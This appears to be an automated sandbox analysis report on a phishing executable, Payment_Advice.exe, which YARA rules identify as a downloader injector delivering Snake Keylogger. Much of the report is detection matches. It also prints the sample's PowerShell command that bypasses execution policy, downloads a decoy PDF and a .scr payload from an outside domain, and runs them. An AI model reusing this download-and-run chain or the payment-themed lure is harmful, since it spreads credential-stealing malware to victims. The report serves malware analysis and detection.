            Source: 0.2.Payment_Advice.exe.5590000.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 23.2.hadvices.scr.5330000.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 23.2.hadvices.scr.2dbf460.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 23.2.hadvices.scr.2dc1ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.301f558.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.3021d98.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment_Advice.exe
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00408AF4 NtdllDefWindowProc_W,DestroyWindow,GetWindowLongW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,DestroyWindow,UnregisterClassW,2_2_00408AF4
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0145AA280_2_0145AA28
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_014591500_2_01459150
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0041ABC02_2_0041ABC0
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040C4D82_2_0040C4D8
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040E4A02_2_0040E4A0
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040EE6A2_2_0040EE6A
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00410EF02_2_00410EF0
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_004102902_2_00410290
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_004103592_2_00410359
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040FF702_2_0040FF70
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_004103132_2_00410313
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040AF872_2_0040AF87
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040FF902_2_0040FF90
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACCA210E4_2_00007FFAACCA210E
            Source: C:\Windows\Temp\hadvices.scrCode function: 23_2_0157AA2823_2_0157AA28
            Source: C:\Windows\Temp\hadvices.scrCode function: 23_2_0157915023_2_01579150
            Source: C:\Windows\Temp\hadvices.scrCode function: 23_2_015730D023_2_015730D0
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_016663C825_2_016663C8
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0166755025_2_01667550
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0166754025_2_01667540
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_01660FC025_2_01660FC0
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177616825_2_01776168
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177C1F025_2_0177C1F0
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177B38825_2_0177B388
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177C4D025_2_0177C4D0
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177C7B225_2_0177C7B2
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177679025_2_01776790
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_017798B825_2_017798B8
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_01774B3125_2_01774B31
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177FA1025_2_0177FA10
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177CA9225_2_0177CA92
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177EDF025_2_0177EDF0
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177BC3225_2_0177BC32
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177BF1025_2_0177BF10
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177E31025_2_0177E310
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177E30025_2_0177E300
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_0177B55225_2_0177B552
            Source: C:\Windows\Temp\hadvices.scrCode function: 25_2_017735CA25_2_017735CA
            Source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1198509905.0000000004015000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000002.1196271509.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment_Advice.exe
            Source: Payment_Advice.exe, 00000000.00000000.1194113240.0000000000D1C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.exe
            Source: Payment_Advice.exeBinary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.exe
            Source: Payment_Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 23.2.hadvices.scr.3e03d90.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.404e590.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.31018e4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.31018e4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.5590000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.5330000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 23.2.hadvices.scr.2dbf460.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 23.2.hadvices.scr.2dc1ca0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.301f558.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Payment_Advice.exe.3021d98.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000000.00000002.1198685438.0000000005590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: Payment_Advice.exe, ----.csSuspicious method names: ._DBB0_DED3_FFFD_FFFD.InjectEvent
            Source: Payment_Advice.exe, C---.csSuspicious method names: .C_FFFD_0333_FFFD.InjectEvent
            Source: Payment_Advice.exe, -U.csSuspicious method names: ._05B5U.InjectEvent
            Source: Payment_Advice.exe, ---.csSuspicious method names: ._0332_0332_FFFD.InjectEvent
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@28/57@8/7
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00402762 LoadResource,SizeofResource,FreeResource,2_2_00402762
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.exe.logJump to behavior
            Source: C:\Windows\Temp\hadvices.scrMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\9D53.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
            Source: Payment_Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Payment_Advice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000339F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000338F000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2460553159.00000000041C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment_Advice.exeReversingLabs: Detection: 28%
            Source: Payment_Advice.exeString found in binary or memory: -Additional exception information unavailable.
            Source: unknownProcess created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
